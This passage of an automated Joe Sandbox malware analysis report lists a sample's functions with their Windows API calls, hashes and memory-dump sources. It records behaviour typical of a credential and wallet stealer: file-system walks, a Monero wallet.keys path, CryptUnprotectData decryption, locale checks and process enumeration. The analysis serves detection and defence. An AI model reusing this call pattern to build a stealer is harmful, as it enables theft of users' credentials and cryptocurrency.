                  • Instruction Fuzzy Hash: 4EB15471900118ABDB24FF60DDA6FEE7379AFD5310F4085A8A40A97191EF306B49CF92
                  Function 009A16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009C510C,?,?,?,009C51B4,?,?,00000000,?,00000000), ref: 009A1923
                  • StrCmpCA.SHLWAPI(?,009C525C), ref: 009A1973
                  • StrCmpCA.SHLWAPI(?,009C5304), ref: 009A1989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009A1D40
                  • DeleteFileA.KERNEL32(00000000), ref: 009A1DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009A1E20
                  • FindClose.KERNEL32(000000FF), ref: 009A1E32
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: 38bf3ed95a922456c6b5dc4b696b26eab595b9a62107e49b537e9bd9eaa661b1
                  • Instruction ID: 1e830326fe055df5d5720e63f5faac6392c664337212d7a80a545de69fb14414
                  • Opcode Fuzzy Hash: 38bf3ed95a922456c6b5dc4b696b26eab595b9a62107e49b537e9bd9eaa661b1
                  • Instruction Fuzzy Hash: AF120471910118ABDB29FB60CDA6FEE737CAF94710F404599B10666491EF306F89CFA2
                  Function 009ADE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,009C0C2E), ref: 009ADE5E
                  • StrCmpCA.SHLWAPI(?,009C14C8), ref: 009ADEAE
                  • StrCmpCA.SHLWAPI(?,009C14CC), ref: 009ADEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009AE3E0
                  • FindClose.KERNEL32(000000FF), ref: 009AE3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: 85ac9041d8c2ad6b97ba1fda8a0d4d200c2d6532779834b3599f8fecd9563842
                  • Instruction ID: a8cf71b689c1d1ecd7452a60c1ffea932a5acfc7025b86c708fc3204dcd7176d
                  • Opcode Fuzzy Hash: 85ac9041d8c2ad6b97ba1fda8a0d4d200c2d6532779834b3599f8fecd9563842
                  • Instruction Fuzzy Hash: 72F19271914118AADB29FB60CDA5FEE7338BF94710F8041D9B41A62491EF306F4ACF66
                  Function 009ADA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009C14B0,009C0C2A), ref: 009ADAEB
                  • StrCmpCA.SHLWAPI(?,009C14B4), ref: 009ADB33
                  • StrCmpCA.SHLWAPI(?,009C14B8), ref: 009ADB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009ADDCC
                  • FindClose.KERNEL32(000000FF), ref: 009ADDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: 83033af0f5fc4dcbc183155e4c5900fc81110f82d52486b6b9a1184d1ebe4f70
                  • Instruction ID: 1fc635fcd40827a1a17831e0b66962cb974c38e2bf1b5959799d1962133cddb8
                  • Opcode Fuzzy Hash: 83033af0f5fc4dcbc183155e4c5900fc81110f82d52486b6b9a1184d1ebe4f70
                  • Instruction Fuzzy Hash: 84913472D00108ABCB14FBB0ED96AED777DAFC5310F408558F90A96591EE34AB49CBD2
                  Function 009B7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,009C05AF), ref: 009B7BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 009B7BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 009B7C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 009B7C62
                  • LocalFree.KERNEL32(00000000), ref: 009B7D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: f48a018640008d0474bf6595c4a3b1a78c1502be7e8001631feec96bce5ebbdc
                  • Instruction ID: 49054b45c38479eb267f7dbf376623bdfd1c33648bd33edd0a9840262f161b29
                  • Opcode Fuzzy Hash: f48a018640008d0474bf6595c4a3b1a78c1502be7e8001631feec96bce5ebbdc
                  • Instruction Fuzzy Hash: 05414C71940218ABDB24DB94DD99BEEB778FF84710F2042D9E00A66291DB346F85CFA1
                  Function 00D6B073 Relevance: 10.4, Strings: 7, Instructions: 1655COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: yw$No_$ r}$&}~.$[eyV$|b2=$}T{Z
                  • API String ID: 0-2555411163
                  • Opcode ID: 67d7ca42d8ebbba1a3fa602a03ce989955a09299e880104022f3726ef3a06211
                  • Instruction ID: 234c19e67778130d1b62e6840de410838cfbf60a1b1a0d08e1c37b014420869c
                  • Opcode Fuzzy Hash: 67d7ca42d8ebbba1a3fa602a03ce989955a09299e880104022f3726ef3a06211
                  • Instruction Fuzzy Hash: 06B20AF3A082049FD7046E2DEC8567AFBE9EFD4720F1A853DEAC4C3744E67598058692
                  Function 009AE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,009C0D73), ref: 009AE4A2
                  • StrCmpCA.SHLWAPI(?,009C14F8), ref: 009AE4F2
                  • StrCmpCA.SHLWAPI(?,009C14FC), ref: 009AE508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 009AEBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: f21b5fe2974b46fd62d65ee8e46d85a8f7db308a26bb447c084f2f6083ef90e8
                  • Instruction ID: c716cde70bdd4fff542b245dd72fc61bacd27fe7268276d9d5b51da9dd9f1945
                  • Opcode Fuzzy Hash: f21b5fe2974b46fd62d65ee8e46d85a8f7db308a26bb447c084f2f6083ef90e8
                  • Instruction Fuzzy Hash: EE125471910118AADB28FB60DEA6FED733CAFD4710F404598B50A96491EF306F49CF96
                  Function 00D6CBCF Relevance: 9.1, Strings: 6, Instructions: 1597COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 1y}$3u6$A-$ErK/$Fv?$^?yi
                  • API String ID: 0-2891130678
                  • Opcode ID: e2907198c6ad0b982537764fdd7bf20df93f2091e5f0f83c806f06550d6f9719
                  • Instruction ID: 045da1079f8f6913db7e5fa9fbd0a5e1151e5833373ecb82e0687470c20d01a1
                  • Opcode Fuzzy Hash: e2907198c6ad0b982537764fdd7bf20df93f2091e5f0f83c806f06550d6f9719
                  • Instruction Fuzzy Hash: 1FB208F3A086049FE304AE2DDC8567AFBE9EF94720F1A853DE9C4D3744E63598058693
                  Function 009AC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 009AC871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 009AC87C
                  • lstrcat.KERNEL32(?,009C0B46), ref: 009AC943
                  • lstrcat.KERNEL32(?,009C0B47), ref: 009AC957
                  • lstrcat.KERNEL32(?,009C0B4E), ref: 009AC978
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: 0462c120872afe7301365fc2e6ce85257c0b07c011fcfa21778254706e6f2465
                  • Instruction ID: 4bd4e5a5ff0e3f192d9804cc0171f107b14ca23e21069020702d9e2e9711b534
                  • Opcode Fuzzy Hash: 0462c120872afe7301365fc2e6ce85257c0b07c011fcfa21778254706e6f2465
                  • Instruction Fuzzy Hash: EE4132B5D0421ADFDB10DF94DD85BEEB7B8AB84704F1045A8F509AB280D7746A84CF92
                  Function 009A7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 009A724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009A7254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009A7281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009A72A4
                  • LocalFree.KERNEL32(?), ref: 009A72AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: 4e07e07d5a7c5fc9f290ebc1b034f79adc9dd442d318f6b4664dd7b4fb6493bf
                  • Instruction ID: fb95ca470153b3154ec87239672d39c28099da409bcd5f82bcc2ee7c54c22311
                  • Opcode Fuzzy Hash: 4e07e07d5a7c5fc9f290ebc1b034f79adc9dd442d318f6b4664dd7b4fb6493bf
                  • Instruction Fuzzy Hash: B3010075A40308BBDB10DBD4CD8AF9D77B8AB44700F104554FB05AB2C0DA70BA008BA5
                  Function 009B9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009B961E
                  • Process32First.KERNEL32(009C0ACA,00000128), ref: 009B9632
                  • Process32Next.KERNEL32(009C0ACA,00000128), ref: 009B9647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 009B965C
                  • CloseHandle.KERNEL32(009C0ACA), ref: 009B967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
